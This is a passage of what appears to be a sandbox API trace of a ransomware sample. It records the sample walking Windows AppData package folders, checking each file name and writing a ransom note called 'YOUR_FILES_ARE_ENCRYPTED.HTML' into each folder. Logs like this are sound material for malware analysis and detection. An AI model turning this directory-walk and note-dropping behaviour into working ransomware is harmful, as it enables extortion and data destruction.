param_1=0x19e0da, param_2="%02X" | out: param_1="DB") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="5D") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="37") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="05") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="ED") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="94") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="34") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="C0") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="8A") returned 2 [0120.300] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="A0") returned 2 [0120.300] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="4E") returned 2 [0120.301] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="2F") returned 2 [0120.301] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="1D") returned 2 [0120.301] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="C4") returned 2 [0120.301] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="06") returned 2 [0120.301] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="B4") returned 2 [0120.301] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="97") returned 2 [0120.301] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="BA") returned 2 [0120.301] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="48") returned 2 [0120.301] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="5B") returned 2 [0120.302] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat" [0120.302] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.302] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0120.310] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe469a1da, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe469a1da, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xe469a1da, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0120.310] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.310] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1") returned 125 [0120.310] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0120.310] lstrlenW (lpString=".LOG1") returned 5 [0120.310] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0120.310] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe469a1da, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe469a1da, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xe469a1da, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0120.310] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.310] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2") returned 125 [0120.310] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0120.310] lstrlenW (lpString=".LOG2") returned 5 [0120.310] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0120.310] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe469a1da, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe469a1da, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xe469a1da, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0120.311] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.311] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0120.311] GetProcessHeap () returned 0x600000 [0120.311] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.313] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.314] CloseHandle (hObject=0x31c) returned 1 [0120.314] GetProcessHeap () returned 0x600000 [0120.314] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.314] GetProcessHeap () returned 0x600000 [0120.314] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.314] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc64d961, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc64d961, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc64d961, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0120.314] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.314] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData") returned 112 [0120.314] GetProcessHeap () returned 0x600000 [0120.314] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.314] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData" [0120.314] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\*" [0120.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc64d961, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc64d961, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc64d961, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.315] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc64d961, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc64d961, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc64d961, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.315] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc64d961, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc64d961, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc64d961, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.315] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.315] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0120.315] GetProcessHeap () returned 0x600000 [0120.315] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.317] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.318] CloseHandle (hObject=0x31c) returned 1 [0120.318] GetProcessHeap () returned 0x600000 [0120.318] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.318] GetProcessHeap () returned 0x600000 [0120.318] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.319] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0120.319] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.319] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState") returned 108 [0120.319] GetProcessHeap () returned 0x600000 [0120.319] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.320] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState" [0120.320] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\*" [0120.320] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.320] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.321] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.321] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.321] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0120.321] GetProcessHeap () returned 0x600000 [0120.321] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.322] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.323] CloseHandle (hObject=0x31c) returned 1 [0120.323] GetProcessHeap () returned 0x600000 [0120.323] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.323] GetProcessHeap () returned 0x600000 [0120.323] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.323] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc6272d1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc6272d1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc6272d1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0120.323] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.324] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0120.324] GetProcessHeap () returned 0x600000 [0120.324] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3106fd8 [0120.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0120.325] WriteFile (in: hFile=0x214, lpBuffer=0x3106fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3106fd8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0120.325] CloseHandle (hObject=0x214) returned 1 [0120.326] GetProcessHeap () returned 0x600000 [0120.326] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.326] GetProcessHeap () returned 0x600000 [0120.326] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0120.327] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9989d823, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9993618c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9993618c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.WindowsFeedback_cw5n1h2txyewy", cAlternateFileName="MICROS~1.WIN")) returned 1 [0120.327] StrStrIW (lpFirst="Microsoft.WindowsFeedback_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.327] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy") returned 88 [0120.327] GetProcessHeap () returned 0x600000 [0120.327] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0120.328] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy" [0120.328] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\*" [0120.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9989d823, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9993618c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x99e6d249, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626838 [0120.329] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9989d823, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9993618c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x99e6d249, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0120.329] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9993618c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9993618c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9993618c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0120.329] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.329] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC") returned 91 [0120.329] GetProcessHeap () returned 0x600000 [0120.329] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.330] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC" [0120.330] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\*" [0120.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9993618c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9993618c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9995c397, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0120.332] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: 